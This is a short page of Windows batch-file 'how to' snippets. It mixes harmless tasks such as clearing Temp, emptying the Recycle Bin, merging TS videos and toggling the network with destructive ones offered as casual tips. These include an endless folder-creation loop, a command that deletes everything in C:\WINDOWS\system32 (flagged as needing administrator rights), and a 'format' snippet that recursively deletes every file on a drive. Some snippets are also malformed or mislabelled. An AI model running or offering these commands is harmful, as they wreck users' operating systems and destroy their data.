Window - BAT

How To Create Unlimited Folder In A Specific Path

@echo off
:Start
cd /d nameOfPath:
md %RANDOM%
goto Start

How To Delete System File

@echo off
del C:\WINDOWS\system32\*.* /q


This .bat need run as administrator.

How To Disable Internet Connection

@echo off
ipconfig / release 

How To Empty "Temp" Folder

del /q/f/s %TEMP%\*

How To Empty Recycle Bin

rd /s /q c:\$Recycle.Bin & rd /s /q d:\$Recycle.Bin

How To Enable Internet Connection

@echo off
ipconfig / renew

How To Format A Hard Drive Location Path

@echo off
del driveLetter:\*.* /f /s /q

How To Join / Merge TS Video Files Together "free and easy"

  1. Rename all the video according to their order sequences.(Example: If videos are from 1-1000, make sure the all the videos name are 4 digits, [0001-1000].)
  2. Open notepad or notepad++.
  3. Copy code below to the notepad.
  4. Save the file as .bat file.
  5. Put the .bat file and the videos in a folder.
  6. Run the .bat file and the merged ts video will generated.


copy /b *.ts MergedFile.ts
pause>nul

Matrix Virus Code

@echo off
color 0a
title ---------------Matrixx Virus---------------
:top
echo %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random% %random% %random% %random% %random% %random%
%random%
goto top

Script for automation routine tasks done after installations

Script for automation of routine tasks done after fresh installations of Windows 10 / Windows Server 2016.


Download and Unzip Reclaim-Windows10-master.zip.

Script to disable / remove Windows 10 Features and Apps

Download and Unzip Debloat-Windows-10-master.zip.

Script to remove Windows 10 bloatware

Download and Unzip Windows10Debloater-master.zip.